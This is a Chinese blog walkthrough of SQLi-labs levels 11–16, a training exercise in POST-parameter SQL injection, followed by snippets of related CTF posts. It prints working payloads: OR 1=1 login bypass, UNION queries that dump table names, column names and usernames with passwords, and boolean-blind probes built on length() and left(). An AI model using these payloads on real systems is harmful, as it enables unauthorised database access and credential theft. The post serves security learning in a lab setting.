CTFweb篇-SQL注入(四)

最新推荐文章于 2024-05-11 22:44:48 发布
最新推荐文章于 2024-05-11 22:44:48 发布
阅读量436 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44597701/article/details/108051616
版权

Less11

这一关主要就是改post请求,用post请求的参数来进行注入
填写admin登陆后仍然没有get参数
在这里插入图片描述
考虑就是post请求
这里就用burp suite抓包
在这里插入图片描述
这里就是post传入的参数值,改的就是这个值
我们把这个值拿到hackbar里面来进行操作
我们传入uname=admin’,系统会报错
right syntax to use near 'admin' LIMIT 0,1' at line 1
我们再传uname=admin",就没有报错了
证明这里是双单引号包裹
于是传入uname=admin1' or 1=1 #&passwd=admin&submit=Submit
在这里插入图片描述
这里为什么要用or 1 = 1,因为用这个只要有一个条件满足,则前面的select的字段的所有值都会被查出来,这里只显示dumb是因为,源文件中select语句只显示一行的数据。
然后用order by 判断出有两个字段
并且用union select 1,2 判断出显示点是1,2个数据
再用database()查出数据库名是security
呈上,于是我们可以使用union进行联合查询
uname=admin11' union select group_concat(table_name) ,2 from information_schema.tables where table_schema = database() #&passwd=admin&submit=Submit
在这里插入图片描述
再查出列名
uname=admin11' union select group_concat(column_name) ,2 from information_schema.columns where table_name= 'users' #&passwd=admin&submit=Submit
在这里插入图片描述
查数据
uname=admin11' union select group_concat(username,':',password) ,2 from users #&passwd=admin&submit=Submit
在这里插入图片描述

Less12

这一关就是数据被( ) 包裹,所以怎么加注释符都没用
其它解题步骤跟11关相似

Less13

这一关就是数据被(’ ‘) 包裹,但是不显示数据库信息
这里需要用到bool盲注
首先通过基本手段判断出参数是由" "包裹
先判断数据库长度
uname=adminsds') or length(database())=8#\&passwd=admin&submit=Submit
显示登录成功,于是知道数据库名长度为8
再查数据库名
uname=adminsd') or left(database(),1)='s'#\&passwd=admin&submit=Submit
完整数据库名采用burp suite暴力破解
暴力破解表名uname=adminsd') or left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e'#\&passwd=admin&submit=Submit改相应参数破解即可。
暴力破解列名
uname=adminsd’) or left((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1)=‘U’#&passwd=admin&submit=Submit
注意这里的字母不区分大小写,数据库查询本身也不区分大小写

Less14

这一关就是双引号包裹,其它跟Less13相同

Less15

这一关就是’ '包裹,其它跟13关没区别

Less16

这一关就是被(" ")包裹

总结

这几关但是改post请求用联合查询以及布尔盲注来进行攻击。

weixin_44597701
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-WEB总结之SQL注入
weixin_41038905的博客
05-01 683
简介 SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎中执行。 Union注入 利用内置函数爆数据库信息及相关信息 version() database() user() current_user() @@datadir数据库路径 @@basedir mysql安装路径 @@ver...
CTF-Web SQL注入
weixin_52182264的博客
04-26 4224
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1203
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
ctf-web-sql注入
热门推荐
god_001的博客
05-03 1万+
题目链接:跳转提示 打开网页,一个登陆页面,根据题是本题题型是基于布尔的SQL盲注 首先在用户名处输入admin 得到结果: 即密码确为admin,而如果不输入用户名直接输入密码,发现报错 可见后台是先判断用户名是否正确存在,当用户名正确后再判断密码是否正确。 经测试发现,当出现'空格符','=','and'等字符时,发现会报错显示:‘illegal character’,即知道这些字符会被过滤,可以用括号来避免空格符的使用,用<>(大于或小于)来避免'='的使用 尝试输入
CG CTF-Web-SQL注入
feng的博客
09-06 354
SQL注入1 进入题目之后先看源码,进行代码审计 <html> <head> Secure Web Login </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(S
CTF-Web(2)SQL注入
大表哥的博客
10-26 477
1.注入介绍1.注入介绍1.目标存在sql注入漏洞,且已经获取目标的绝对路径2.并且通过探测发现目标能够进行数据的导入和导出操作,即secure_file_priv为空3.当前数据库是(即dba权限)4.利用Into outfile() (写入文件的函数),向指定路径写入一句话木马5.webshell连接工具连接一句话木马,成功获得权限区别:手工注入需要手动输入参数判断注入点,盲注则利用脚本、自动化工具爆破。
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
了解如何防范SQL注入、命令注入和文件包含注入至关重要。 2. **变量和作用域**:理解PHP中的变量如何工作,以及全局、局部、静态和超全局变量的作用域,有助于识别可能导致安全问题的代码片段。 3. **文件操作**:...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
1. **SQL注入**:参赛者需要了解如何利用不安全的SQL查询来获取敏感信息,以及如何防御这类攻击,如参数化查询、输入验证和使用预编译语句。 2. **XSS(Cross Site Scripting)**:试题可能包含对XSS漏洞的利用,如...
SQL注入漏洞演示源代码
07-15
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过在输入字段...
CTF-Write-up:CTF撰写和信息
03-21
4. **漏洞分析**:详细解释发现的漏洞类型及其原理,例如SQL注入、XSS跨站脚本攻击或缓冲区溢出。 5. **解题步骤**:按照时间顺序,一步步记录解决问题的过程,包括尝试的方法、遇到的困难以及解决方案。 6. **...
CtfHub-web-sql注入
BROTHERYY的博客
05-08 551
1.整数型注入 确定注入点! 得到数据库以及版本 得到字段! 字段也是flag 2.字符型注入 这里和数字型差不多 使用单引号闭合就可以 by 3 就没回显 确定只有2 得到数据库和版本号 发现和上面的数字型一样 直接注flag吧 3.报错注入 这里直接sqlmap跑一把 猜测还是一样的表名,字段名直接一把撸到底 4.bool注入 这个自己尝试写了个脚本跑出来了 但是自己的脚本水平太烂 ! 下步加强学习 上面试sqlmap的下面是自己写的 5.时间注入 这里也是使用脚本跑,这里发现自己的脚本和s
CTFshow——web入门——sql注入
h_adam的博客
03-14 5463
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
CTF-Web-Sql注入-强网杯 2019]随便注
weixin_42566218的博客
02-21 1493
CTF-Web-Sql注入-强网杯 2019]随便注 题目链接:BUUCTF 类型:sql注入 知识点:堆叠注入、mysql句柄操作(handler) 解题过程 方法1 测试注入点发现GET型字符注入, ?inject=1' or '1'='1 order by爆破字段2 ?inject=1' order by 3%23 配合union select发现过滤规则 ?inject=1' union select 1,2%23 没有过滤分号,测试堆叠注入成功,查询当前数据库的
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 384
个人CTF学习之路
CTFweb学习记录 -- SQL注入基础
lifanxin的博客
05-18 743
SQL注入概述基本原理MySql注入基本知识information_schemasql注入常用知识总结 概述   SQL注入就是指web应用程序对用户输入数据的合法性没有判断,没有进行有效的字符过滤,前端传入后端的参数是攻击者可控的,并且参数被带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。 基本原理   所谓sql注入的基本原理,也就是说sql注入是怎么发生的,我们以下面php代码中构造sql查询语句的方式为例。 <?php $id = $_GET['id']; $que
实验吧简单的sql注入解题思路
ZweLL032的博客
03-17 8286
解题思路:研究了好久,看了writeup才知道 1)在文本框输入1,提交,链接变成id=1 2)在文件框输入1‘,提交,报错,判断存在注入。3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。 4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag fro
BUUCTF web SQL注入
m0_55854679的博客
08-09 2778
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据题目,可以想到此题目为sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值